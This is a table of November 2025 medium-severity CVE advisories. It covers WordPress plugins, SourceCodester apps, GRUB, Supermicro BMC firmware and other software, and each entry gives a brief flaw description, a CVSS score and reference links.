| MongoDB--C Driver | A mongoc_bulk_operation_t may read invalid memory if large options are passed. | 2025-11-18 | 6.8 | CVE-2025-12119 | https://github.com/mongodb/mongo-php-driver/releases/tag/1.21.2 https://github.com/mongodb/mongo-c-driver/releases/tag/1.30.6 https://github.com/mongodb/mongo-c-driver/releases/tag/2.1.2   |
| n/a--libvirt | A flaw was found in libvirt. External inactive snapshots for shut-down VMs are incorrectly created as world-readable, making it possible for unprivileged users to inspect the guest OS contents. This results in an information disclosure vulnerability. | 2025-11-17 | 5.5 | CVE-2025-13193 |
https://access.redhat.com/security/cve/CVE-2025-13193 |
| nalam-1--Magical Products Display Elementor WooCommerce Widgets | Product Sliders, Grids & AJAX Search | The Magical Products Display plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mpdpr_title_tag' and 'mpdpr_subtitle_tag' parameters in the MPD Pricing Table widget in all versions up to, and including, 1.1.29 due to insufficient input sanitization and output escaping on user-supplied HTML tag names. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-12964 | https://www.wordfence.com/threat-intel/vulnerabilities/id/758e23b9-c3d5-4f1c-9659-66483d6f0578?source=cve https://plugins.trac.wordpress.org/browser/magical-products-display/tags/1.1.29/includes/widgets/pricing-table.php#L2149 https://plugins.trac.wordpress.org/browser/magical-products-display/tags/1.1.29/includes/widgets/pricing-table.php#L2167 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394768%40magical-products-display&new=3394768%40magical-products-display&sfp_email=&sfph_mail=   |
| nikolayyordanov--Like-it | The Like-it plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2. This is due to missing or incorrect nonce validation on the likeit_conf() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 6.1 | CVE-2025-12404 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ad1d9f5-c224-4d28-8d73-439b3c5ca24f?source=cve https://plugins.trac.wordpress.org/browser/like-it/tags/2.2/like-it.php#L130 https://plugins.trac.wordpress.org/browser/like-it/tags/2.2/like-it.php#L131 https://plugins.trac.wordpress.org/browser/like-it/tags/2.2/tpl/config.php#L37   |
| ninjateam--WP Duplicate Page | The WP Duplicate Page plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action in the 'saveSettings' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify plugin settings that control role capabilities, and subsequently exploit the misconfigured capabilities to duplicate and view password-protected posts containing sensitive information. | 2025-11-18 | 4.3 | CVE-2025-12481 | https://www.wordfence.com/threat-intel/vulnerabilities/id/61105f6a-1bd7-415d-9481-a1c2c310f778?source=cve https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Page/Settings.php#L92 https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Classes/ButtonDuplicate.php#L137 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394773%40wp-duplicate-page%2Ftrunk&old=3386144%40wp-duplicate-page%2Ftrunk&sfp_email=&sfph_mail=   |
| NixOS--nixpkgs | NixOS's Onlyoffice is a software suite that offers online and offline tools for document editing, collaboration, and management. In versions from 22.11 to before 25.05 and versions before Unstable 25.11, a hard-coded secret was used in the NixOS module for the OnlyOffice document server to protect its file cache. An attacker with knowledge of an existing revision ID could use this secret to obtain a document. In practice, an arbitrary revision ID should be hard to obtain. The primary impact is likely the access to known documents from users with expired access. This issue was resolved in NixOS unstable version 25.11 and version 25.05. | 2025-11-17 | 5.3 | CVE-2025-64766 | https://github.com/NixOS/nixpkgs/security/advisories/GHSA-58m4-5wg3-5g5v https://github.com/NixOS/nixpkgs/pull/462100 https://github.com/NixOS/nixpkgs/pull/462204 https://github.com/NixOS/nixpkgs/commit/8e74d05e3de4ee5ad320cd585a7e0f12a4730869 https://github.com/NixOS/nixpkgs/commit/cec38dec00df26a901eb8b424d53bbb3bcc72eec   |
| open-formulieren--open-forms | Open Forms allows users create and publish smart forms. Prior to versions 3.2.7 and 3.3.3, forms where the prefill data fields are dynamically set to readonly/disabled can be modified by malicious users deliberately trying to modify data they're not supposed to. For regular users, the form fields are marked as readonly and cannot be modified through the user interface. This issue has been patched in versions 3.2.7 and 3.3.3. | 2025-11-18 | 4.3 | CVE-2025-64515 | https://github.com/open-formulieren/open-forms/security/advisories/GHSA-cp63-63mq-5wvf https://github.com/open-formulieren/open-forms/blob/bcf2dc54c695fb7c8c58712627d82c4b766248b6/CHANGELOG.rst#327-2025-11-18 https://github.com/open-formulieren/open-forms/blob/bcf2dc54c695fb7c8c58712627d82c4b766248b6/CHANGELOG.rst#333-2025-11-18   |
| Opto22--GRV-EPIC-PR1 | A vulnerability exists in the Opto22 Groov Manage REST API on GRV-EPIC and groov RIO Products that allows remote code execution with root privileges. When a POST request is executed against the vulnerable endpoint, the application reads certain header details and unsafely uses these values to build commands, allowing an attacker with administrative privileges to inject arbitrary commands that execute as root. | 2025-11-20 | 6.2 | CVE-2025-13087 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-03 https://www.opto22.com/support/resources-tools/knowledgebase/kb91326 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-03.json   |
| OSC--ondemand | Open OnDemand is an open-source HPC portal. Prior to versions 4.0.8 and 3.1.16, users can craft a "Time of Check to Time of Use" (TOCTOU) attack when downloading zip files to access files outside of the OOD_ALLOWLIST. This vulnerability impacts sites that use the file browser allowlists in all current versions of OOD. However, files accessed are still protected by the UNIX permissions. Open OnDemand versions 4.0.8 and 3.1.16 have been patched for this vulnerability. | 2025-11-20 | 4.3 | CVE-2025-62724 | https://github.com/OSC/ondemand/security/advisories/GHSA-vjpg-34px-gjrw   |
| pluginsGLPI--databaseinventory | pluginsGLPI's Database Inventory Plugin "manages" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. In versions prior to 1.0.3, any authenticated user could send requests to agents. This issue has been patched in version 1.0.3. | 2025-11-18 | 4.3 | CVE-2025-53360 | https://github.com/pluginsGLPI/databaseinventory/security/advisories/GHSA-5j5j-xr62-jr58 https://github.com/pluginsGLPI/databaseinventory/commit/0a376a0c6f4142e11ea518faefe95c01b176fd87 https://github.com/pluginsGLPI/databaseinventory/commit/7dcad1efb6ee84e9cffb3b446cdb47dc0be1091e https://github.com/pluginsGLPI/databaseinventory/commit/e9d4474acdab4141a6f4798cdd406b0d04480269   |
| powerblogservice--AuthorSure | The AuthorSure plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3. This is due to missing or incorrect nonce validation on the 'authorsure' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-21 | 6.1 | CVE-2025-13134 | https://www.wordfence.com/threat-intel/vulnerabilities/id/81070529-b269-44b0-8f21-b08add63a099?source=cve https://drive.google.com/file/d/1ZVmQSyjgRxNVGef7Zkzdws8kLraxOt59/view?pli=1   |
| Progress--MOVEit Transfer | Server-Side Request Forgery (SSRF) vulnerability in Progress MOVEit Transfer.This issue affects MOVEit Transfer: before 2024.1.8, from 2025.0.0 before 2025.0.4. | 2025-11-19 | 5.3 | CVE-2025-13147 | https://docs.progress.com/bundle/moveit-transfer-release-notes-2024/page/Fixed-Issues-in-2024.1.8.html https://docs.progress.com/bundle/moveit-transfer-release-notes-2025/page/Fixed-Issues-in-2025.0.4.html https://docs.progress.com/bundle/moveit-transfer-release-notes-2025_1/page/Fixed-Issues-in-2025.1.html   |
| projectworlds--Advanced Library Management System | A vulnerability was identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /add_member.php. Such manipulation of the argument roll_number leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2025-11-17 | 6.3 | CVE-2025-13254 | VDB-332589 | projectworlds Advanced Library Management System add_member.php sql injection VDB-332589 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #687854 | projectworlds Advanced Library Management System 1.0 SQL Injection https://github.com/Wyg2002yx/cve/blob/main/002/report.md   |
| projectworlds--Advanced Library Management System | A security flaw has been discovered in projectworlds Advanced Library Management System 1.0. This issue affects some unknown processing of the file /book_search.php. Performing manipulation of the argument book_pub/book_title results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. | 2025-11-17 | 6.3 | CVE-2025-13255 | VDB-332590 | projectworlds Advanced Library Management System book_search.php sql injection VDB-332590 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #687855 | projectworlds Advanced Library Management System 1.0 SQL Injection Submit #687857 | projectworlds Advanced Library Management System 1.0 SQL Injection (Duplicate) https://github.com/Wyg2002yx/cve/blob/main/003/report.md https://github.com/Wyg2002yx/cve/blob/main/004/report.md   |
| projectworlds--Advanced Library Management System | A weakness has been identified in projectworlds Advanced Library Management System 1.0. Impacted is an unknown function of the file /borrow.php. Executing manipulation of the argument roll_number can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-11-17 | 6.3 | CVE-2025-13256 | VDB-332591 | projectworlds Advanced Library Management System borrow.php sql injection VDB-332591 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #687856 | projectworlds Advanced Library Management System 1.0 SQL Injection https://github.com/Wyg2002yx/cve/blob/main/005/report.md   |
| projectworlds--Advanced Library Management System | A vulnerability has been found in projectworlds Advanced Library Management System 1.0. Impacted is an unknown function of the file /borrowed_book_search.php. Such manipulation of the argument datefrom/dateto leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13278 | VDB-332613 | projectworlds Advanced Library Management System borrowed_book_search.php sql injection VDB-332613 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690797 | projectworlds Advanced Library Management System 1.0 SQL Injection https://github.com/CH0ico/CVE_choco_1/blob/master/report.md   |
| projectworlds--can pass malicious payloads | A security flaw has been discovered in projectworlds can pass malicious payloads up to 1.0. This vulnerability affects unknown code of the file /add_book.php. The manipulation of the argument image results in unrestricted upload. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-11-23 | 6.3 | CVE-2025-13573 | VDB-333337 | projectworlds can pass malicious payloads add_book.php unrestricted upload VDB-333337 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698646 | projectworlds Advanced Library Management System V1.0 Unrestricted Upload https://github.com/GYSakura/tmp75/blob/main/report.md   |
| publishpress--Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories | The Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the "saveFutureActionData" function in all versions up to, and including, 4.9.1. This makes it possible for authenticated attackers, with author level access and above, to change the status of arbitrary posts and pages via the REST API endpoint. | 2025-11-21 | 4.3 | CVE-2025-13149 | https://www.wordfence.com/threat-intel/vulnerabilities/id/82ea0ebc-08aa-4ef5-b6b1-c7c13715ef6d?source=cve https://github.com/publishpress/publishpress-future/commit/0cbefc1632c6f1fffc5fa0ca85e6b8a641d41c7f   |
| qzzr--Pollcaster Shortcode Plugin | The Pollcaster Shortcode Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'height' parameter in the 'pollcaster' shortcode in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-12661 | https://www.wordfence.com/threat-intel/vulnerabilities/id/120ba9e5-9594-4a4f-b475-ef3fcf5f4565?source=cve https://wordpress.org/plugins/pollcaster-shortcode/ https://plugins.trac.wordpress.org/browser/pollcaster-shortcode/tags/1.0/pollcaster.php#L33   |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability has been identified in the GRUB2 bootloader's network module that poses an immediate Denial of Service (DoS) risk. This flaw is a Use-after-Free issue, caused because the net_set_vlan command is not properly unregistered when the network module is unloaded from memory. An attacker who can execute this command can force the system to access memory locations that are no longer valid. Successful exploitation leads directly to system instability, which can result in a complete crash and halt system availability | 2025-11-18 | 4.9 | CVE-2025-54770 | https://access.redhat.com/security/cve/CVE-2025-54770 RHBZ#2413813   |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free vulnerability has been identified in the GNU GRUB (Grand Unified Bootloader). The flaw occurs because the file-closing process incorrectly retains a memory pointer, leaving an invalid reference to a file system structure. An attacker could exploit this vulnerability to cause grub to crash, leading to a Denial of Service. Possible data integrity or confidentiality compromise is not discarded. | 2025-11-18 | 4.9 | CVE-2025-54771 | https://access.redhat.com/security/cve/CVE-2025-54771 RHBZ#2413823   |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability has been identified in the GRUB (Grand Unified Bootloader) component. This flaw occurs because the bootloader mishandles string conversion when reading information from a USB device, allowing an attacker to exploit inconsistent length values. A local attacker can connect a maliciously configured USB device during the boot sequence to trigger this issue. A successful exploitation may lead GRUB to crash, leading to a Denial of Service. Data corruption may be also possible, although given the complexity of the exploit the impact is most likely limited. | 2025-11-18 | 4.8 | CVE-2025-61661 | https://access.redhat.com/security/cve/CVE-2025-61661 RHBZ#2413827   |
| Red Hat--Red Hat Enterprise Linux 10 | A Use-After-Free vulnerability has been discovered in GRUB's gettext module. This flaw stems from a programming error where the gettext command remains registered in memory after its module is unloaded. An attacker can exploit this condition by invoking the orphaned command, causing the application to access a memory location that is no longer valid. An attacker could exploit this vulnerability to cause grub to crash, leading to a Denial of Service. Possible data integrity or confidentiality compromise is not discarded. | 2025-11-18 | 4.9 | CVE-2025-61662 | https://access.redhat.com/security/cve/CVE-2025-61662 RHBZ#2414683   |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability has been identified in the GRUB2 bootloader's normal command that poses an immediate Denial of Service (DoS) risk. This flaw is a Use-after-Free issue, caused because the normal command is not properly unregistered when the module is unloaded. An attacker who can execute this command can force the system to access memory locations that are no longer valid. Successful exploitation leads directly to system instability, which can result in a complete crash and halt system availability. Impact on the data integrity and confidentiality is also not discarded. | 2025-11-18 | 4.9 | CVE-2025-61663 | https://access.redhat.com/security/cve/CVE-2025-61663 RHBZ#2414684   |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability in the GRUB2 bootloader has been identified in the normal module. This flaw, a memory Use After Free issue, occurs because the normal_exit command is not properly unregistered when its related module is unloaded. An attacker can exploit this condition by invoking the command after the module has been removed, causing the system to improperly access a previously freed memory location. This leads to a system crash or possible impacts in data confidentiality and integrity. | 2025-11-18 | 4.9 | CVE-2025-61664 | https://access.redhat.com/security/cve/CVE-2025-61664 RHBZ#2414685   |
| rometheme--RTMKit | The RTMKit Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion Block's attributes in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-8609 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a4601d9e-02bb-4b27-b16e-7cfc0fc19919?source=cve https://plugins.trac.wordpress.org/browser/rometheme-for-elementor/trunk/widgets/rkit_widgets/rkit_image_accordion.php#L1032 https://plugins.trac.wordpress.org/changeset/3369481/rometheme-for-elementor/trunk/widgets/rkit_widgets/rkit_image_accordion.php   |
| rsync--rsync | A malicious client acting as the receiver of an rsync file transfer can trigger an out of bounds read of a heap based buffer, via a negative array index. The malicious rsync client requires at least read access to the remote rsync module in order to trigger the issue. | 2025-11-18 | 4.3 | CVE-2025-10158 | https://github.com/RsyncProject/rsync/commit/797e17fc4a6f15e3b1756538a9f812b63942686f https://attackerkb.com/assessments/fbacb2a6-d1cd-4011-bb3a-f06b1c8306b1   |
| Rumpus--FTP Server | CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | 2025-11-17 | 6.8 | CVE-2025-55055 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| Rumpus--FTP Server | Multiple CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-11-17 | 4.8 | CVE-2025-55056 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| Rumpus--FTP Server | Multiple CWE-352 Cross-Site Request Forgery (CSRF) | 2025-11-17 | 4.5 | CVE-2025-55057 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| Rumpus--FTP Server | CWE-20 Improper Input Validation | 2025-11-17 | 4.5 | CVE-2025-55058 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| Rumpus--FTP Server | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-11-17 | 4.8 | CVE-2025-55059 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| rustaurius--Affiliate AI Lite | The Affiliate AI Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'asin' shortcode attribute in the affiai_img shortcode in all versions up to, and including, 1.0.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11799 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b05f4ef4-aa64-4cf4-a278-604df8407d12?source=cve https://plugins.trac.wordpress.org/browser/affiliate-ai-lite/tags/1.0.1/includes/afx-img.php#L53 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399153%40affiliate-ai-lite&new=3399153%40affiliate-ai-lite   |
| rustybadrobot--Display Pages Shortcode | The Display Pages Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'column_count' parameter in the [display-pages] shortcode in all versions up to, and including, 1.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11763 | https://www.wordfence.com/threat-intel/vulnerabilities/id/df4ada5f-6008-40b9-ad83-c6af82e64e9f?source=cve https://plugins.trac.wordpress.org/browser/display-pages-shortcode/trunk/display-pages-shortcode.php#L513 https://plugins.trac.wordpress.org/browser/display-pages-shortcode/trunk/display-pages-shortcode.php#L517   |
| saadiqbal--New User Approve | The New User Approve plugin for WordPress is vulnerable to unauthorized data disclosure in all versions up to, and including, 3.0.9 due to insufficient API key validation using loose equality comparison. This makes it possible for unauthenticated attackers to retrieve personally identifiable information (PII), including usernames and email addresses of users with various approval statuses via the Zapier REST API endpoints, by exploiting PHP type juggling with the api_key parameter set to "0" on sites where the Zapier API key has not been configured. | 2025-11-19 | 5.3 | CVE-2025-12770 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3f1cf77a-64b4-405b-adcb-ef16d9e82ab2?source=cve https://plugins.trac.wordpress.org/browser/new-user-approve/tags/3.0.9/includes/zapier/includes/rest-api.php#L104 https://plugins.trac.wordpress.org/browser/new-user-approve/tags/3.0.9/includes/zapier/includes/rest-api.php#L40 https://plugins.trac.wordpress.org/browser/new-user-approve/trunk/includes/zapier/includes/rest-api.php#L104   |
| sayontan--Photonic Gallery & Lightbox for Flickr, SmugMug & Others | The Photonic Gallery & Lightbox for Flickr, SmugMug & Others plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's lightbox functionality in all versions up to, and including, 3.21 due to insufficient input sanitization and output escaping on user supplied caption attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page. | 2025-11-18 | 6.4 | CVE-2025-12691 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9f21f4a4-4b50-4396-8d94-26d68c0eb3a3?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3392284%40photonic&old=3336902%40photonic&sfp_email=&sfph_mail=   |
| Saysis Computer Systems Trade Ltd. Co.--StarCities | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Saysis Computer Systems Trade Ltd. Co. StarCities allows Reflected XSS.This issue affects StarCities: before 1.1.61. | 2025-11-19 | 5.4 | CVE-2025-11963 | https://www.usom.gov.tr/bildirim/tr-25-0403   |
| scottpaterson--Subscriptions & Memberships for PayPal | The Subscriptions & Memberships for PayPal plugin for WordPress is vulnerable to fake payment creation in all versions up to, and including, 1.1.7. This is due to the plugin not properly verifying the authenticity of an IPN request. This makes it possible for unauthenticated attackers to create fake payment entries that have not actually occurred. | 2025-11-22 | 5.3 | CVE-2025-12752 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8f706b78-2d67-442c-b7a0-7d7a0fd24b2d?source=cve https://plugins.trac.wordpress.org/browser/subscriptions-memberships-for-paypal/trunk/includes/public_ipn.php https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397608%40subscriptions-memberships-for-paypal&new=3397608%40subscriptions-memberships-for-paypal&sfp_email=&sfph_mail=   |
| seventhqueen--Restrictions for BuddyPress | The Restrictions for BuddyPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_optin_optout() function in all versions up to, and including, 1.5.2. This makes it possible for unauthenticated attackers to opt in and out of tracking. | 2025-11-18 | 5.3 | CVE-2025-12391 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fe5ed7-17e2-4098-a51b-3b780721bf2e?source=cve https://wordpress.org/plugins/bp-restrict/   |
| Shopside Software Technologies Inc.--Shopside | Improper Restriction of Rendered UI Layers or Frames vulnerability in Shopside Software Technologies Inc. Shopside allows iFrame Overlay.This issue affects Shopside: through 05022025. | 2025-11-19 | 4.7 | CVE-2025-0421 | https://www.usom.gov.tr/bildirim/tr-25-0402   |
| Siemens--Mendix RichText | A vulnerability has been identified in Mendix RichText (All versions >= V4.0.0 < V4.6.1). Affected widget does not properly neutralize the input. This could allow an attacker to execute cross-site scripting attacks. | 2025-11-17 | 5.7 | CVE-2025-40834 | https://cert-portal.siemens.com/productcert/html/ssa-190588.html   |
| SMCI--MBD-X13SEDW-F | Stack-based buffer overflow in the SMASH-CLP shell. An authenticated attacker with SSH access to the BMC can exploit a stack buffer overflow via a crafted SMASH command, overwrite the return address and registers, and achieve arbitrary code execution on the BMC firmware operating system | 2025-11-18 | 5.4 | CVE-2025-7623 | https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025   |
| SMCI--MBD-X13SEDW-F | Stack buffer overflow vulnerability exists in the Supermicro BMC Shared library. An authenticated attacker with access to the BMC exploit stack buffer via a crafted  header and achieve arbitrary code execution of the BMC's firmware operating system. | 2025-11-18 | 5.5 | CVE-2025-8404 | https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025   |
| softaculous--SiteSEO SEO Simplified | The SiteSEO - SEO Simplified plugin for WordPress is vulnerable to unauthorized modification of data due to n incorrect capability check on the siteseo_reset_settings function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, who have been granted access to at least on SiteSEO setting capability, to reset the plugin's settings. | 2025-11-19 | 5.3 | CVE-2025-12814 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a376cafb-656c-4fe1-b5c1-c7e38dc5040e?source=cve https://plugins.trac.wordpress.org/browser/siteseo/tags/1.3.2/main/ajax.php#L90 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397272%40siteseo&new=3397272%40siteseo&sfp_email=&sfph_mail=   |
| softaculous--SiteSEO SEO Simplified | The SiteSEO - SEO Simplified plugin for WordPress is vulnerable to Improper Authorization leading to Sensitive Post Meta Disclosure in versions up to and including 1.3.2. This is due to missing object-level authorization checks in the resolve_variables() AJAX handler. This makes it possible for authenticated attackers with the siteseo_manage capability (e.g., Author-level users who have been granted SiteSEO access by an administrator) to read arbitrary post metadata from any post, page, attachment, or WooCommerce order they cannot edit, via the custom field variable resolution feature granted they have been given access to SiteSEO by an administrator and legacy storage is enabled. In affected WooCommerce installations, this exposes sensitive customer billing information including names, email addresses, phone numbers, physical addresses, and payment methods. | 2025-11-19 | 4.3 | CVE-2025-13085 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4d740ba8-4877-4b27-a1cb-26095f851ea6?source=cve https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/ajax.php#L542 https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/titlesmetas.php#L494 https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/admin.php#L106 https://plugins.trac.wordpress.org/changeset/3397272/siteseo/trunk?contextall=1&old=3387094&old_path=%2Fsiteseo%2Ftrunk   |
| SolarWinds--SolarWinds Observability Self-Hosted | SolarWinds Observability Self-Hosted XSS Vulnerability. The SolarWinds Platform was susceptible to a XSS vulnerability that affects user-created URL fields. This vulnerability requires authentication from a low-level account. | 2025-11-18 | 5.4 | CVE-2025-26391 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-26391 https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/hco_2025-4-1_release_notes.htm   |
| SolarWinds--SolarWinds Observability Self-Hosted | SolarWinds Observability Self-Hosted is susceptible to an open redirection vulnerability. The URL is not properly sanitized, and an attacker could manipulate the string to redirect a user to a malicious site. The attack complexity is high, and authentication is required. | 2025-11-18 | 4.8 | CVE-2025-40545 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40545 https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/hco_2025-4-1_release_notes.htm   |
| SourceCodester--Alumni Management System | A weakness has been identified in SourceCodester Alumni Management System 1.0. This issue affects the function delete_forum/delete_career/delete_comment/delete_gallery/delete_event of the file admin/admin_class.php of the component Delete Handler. Executing manipulation of the argument ID can lead to missing authorization. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-11-20 | 5.4 | CVE-2025-13468 | VDB-333041 | SourceCodester Alumni Management System Delete admin_class.php delete_event authorization VDB-333041 | CTI Indicators (IOB, IOC, IOA) Submit #694826 | SourceCodester Alumni Management System 1.0 Missing Authorization https://hackmd.io/@mlgzackfly/SourceCodester https://www.sourcecodester.com/   |
| SourceCodester--Dental Clinic Appointment Reservation System | A vulnerability was detected in SourceCodester Dental Clinic Appointment Reservation System 1.0. Impacted is an unknown function of the file /success.php. Performing manipulation of the argument username/password results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13267 | VDB-332602 | SourceCodester Dental Clinic Appointment Reservation System success.php sql injection VDB-332602 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689450 | Dental Clinic Appointment Reservation System 1.0 SQL Injection https://github.com/0xffaaa/cve/blob/main/Dental_Clinic_Appointment_Reservation_System_Time-Based_SQL_Injection2.md https://www.sourcecodester.com/   |
| SourceCodester--Inventory Management System | A weakness has been identified in SourceCodester Inventory Management System 1.0. The affected element is an unknown function of the file /model/user/resetPassword.php. Executing manipulation can lead to weak password recovery. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. | 2025-11-23 | 5.3 | CVE-2025-13565 | VDB-333329 | SourceCodester Inventory Management System resetPassword.php password recovery VDB-333329 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697984 | SourceCodester Inventory Management System 1.0 Business Logic Errors https://www.notion.so/Unauthenticated-Password-Reset-Vulnerability-in-SourceCodester-Inventory-Management-System-2b023917db8c8001b5ecf4c50a54dfbd?source=copy_link https://www.sourcecodester.com/   |
| SourceCodester--Online Magazine Management System | A vulnerability was identified in SourceCodester Online Magazine Management System 1.0. Affected by this issue is some unknown functionality of the file /categories.php. The manipulation of the argument c leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-11-17 | 6.3 | CVE-2025-13263 | VDB-332598 | SourceCodester Online Magazine Management System categories.php sql injection VDB-332598 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689416 | Online Magazine Management System 1.0 SQL Injection https://github.com/0xffaaa/cve/blob/main/Online%20Magazine%20Management%20System%20SQL%20blind%20injection(SQLI).md https://www.sourcecodester.com/   |
| SourceCodester--Online Magazine Management System | A security flaw has been discovered in SourceCodester Online Magazine Management System 1.0. This affects an unknown part of the file /view_magazine.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-11-17 | 6.3 | CVE-2025-13264 | VDB-332599 | SourceCodester Online Magazine Management System view_magazine.php sql injection VDB-332599 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689424 | Online Magazine Management System 1.0 SQL Injection https://github.com/0xffaaa/cve/blob/main/Online%20Magazine%20Management%20System%20SQL%20blind%20injection2(SQLI)%20.md https://www.sourcecodester.com/   |
| SourceCodester--Pre-School Management System | A security flaw has been discovered in SourceCodester Pre-School Management System 1.0. Impacted is the function removefile of the file app/controllers/FilehelperController.php. Performing manipulation of the argument filepath results in denial of service. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-11-23 | 5.4 | CVE-2025-13564 | VDB-333328 | SourceCodester Pre-School Management System FilehelperController.php removefile denial of service VDB-333328 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697083 | Pre-School Management System 1.0 delete file https://github.com/0xffaaa/cve/blob/main/Pre_School_Management_System_Arbitrary_File_Deletion_Vulnerabilit.md https://www.sourcecodester.com/   |
